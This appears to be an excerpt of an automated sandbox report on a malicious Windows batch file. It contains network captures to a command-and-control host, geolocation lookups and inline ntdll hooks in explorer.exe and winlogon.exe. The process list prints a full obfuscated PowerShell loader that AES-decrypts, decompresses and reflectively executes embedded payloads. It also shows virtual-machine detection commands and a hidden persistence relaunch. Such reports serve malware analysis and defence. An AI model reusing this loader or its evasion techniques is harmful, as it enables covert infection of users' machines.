Oct 3, 2024 14:55:31.637123108 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.637132883 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.637198925 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.637253046 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.637262106 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.637294054 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.637360096 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.640480995 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.641427040 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.642551899 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.642729044 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.642784119 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.642836094 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.642889977 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.642951012 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.642978907 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.643012047 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.643074989 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.643104076 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.643135071 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.646497011 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.646526098 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.646574974 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.646603107 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.648124933 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.648153067 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.648180962 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.648271084 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.081839085 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.129956007 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:32.289861917 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.318439007 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:32.318517923 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:32.533406973 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.533498049 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.533852100 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.533900023 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.534133911 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.534288883 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.534328938 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.534411907 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.534427881 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.858017921 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:32.911122084 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:33.008930922 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.052560091 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:33.076281071 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:33.076384068 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:33.081198931 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.081257105 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.081289053 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.081367016 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.081396103 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.081470013 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.081504107 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.081516981 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.402529955 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.458013058 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:33.554822922 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.583050966 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:33.583137989 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:33.588046074 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.588076115 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.588141918 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:33.588170052 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:58.599034071 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:58.604867935 CEST	6969	63301	154.216.20.132	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 14:54:24.731015921 CEST	53	56576	1.1.1.1	192.168.2.8
Oct 3, 2024 14:54:26.387998104 CEST	53	57026	1.1.1.1	192.168.2.8
Oct 3, 2024 14:55:19.912883997 CEST	64075	53	192.168.2.8	1.1.1.1
Oct 3, 2024 14:55:20.220765114 CEST	53	64075	1.1.1.1	192.168.2.8
Oct 3, 2024 14:55:22.189640999 CEST	55962	53	192.168.2.8	1.1.1.1
Oct 3, 2024 14:55:22.197309017 CEST	53	55962	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 14:55:19.912883997 CEST	192.168.2.8	1.1.1.1	0x6d9a	Standard query (0)	azure-winsecure.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:55:22.189640999 CEST	192.168.2.8	1.1.1.1	0x9837	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 14:54:17.156832933 CEST	1.1.1.1	192.168.2.8	0xeecf	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:54:17.156832933 CEST	1.1.1.1	192.168.2.8	0xeecf	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:55:20.220765114 CEST	1.1.1.1	192.168.2.8	0x6d9a	No error (0)	azure-winsecure.com	154.216.20.132	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:55:22.197309017 CEST	1.1.1.1	192.168.2.8	0x9837	No error (0)	ipwho.is	195.201.57.90	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipwho.is

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	63304	195.201.57.90	443	7080	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 12:55:23 UTC	150	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
2024-10-03 12:55:23 UTC	223	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 12:55:23 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2024-10-03 12:55:23 UTC	1019	IN	Data Raw: 33 65 66 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 Data Ascii: 3ef{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.33", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yor

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	08:54:04
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" "
Imagebase:	0x7ff6713a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:54:04
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:54:04
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff659df0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:54:04
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Imagebase:	0x7ff69db00000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:54:04
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff659df0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:54:04
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff69db00000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:54:06
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Imagebase:	0x7ff6713a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:54:06
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:54:13
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392
Imagebase:	0x7ff68ec70000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:54:29
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff6713a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:54:29
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:54:29
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Imagebase:	0x7ff6713a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:54:29
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 1308, Parent PID: 3228

General

Target ID:	19
Start time:	08:54:30
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:	0x7ff6713a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	08:54:30
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	08:54:30
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff659df0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:54:30
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Imagebase:	0x7ff69db00000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:54:31
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff659df0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:54:31
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff69db00000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:54:59
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Imagebase:	0x7ff6713a0000
File size:	289'792 bytes
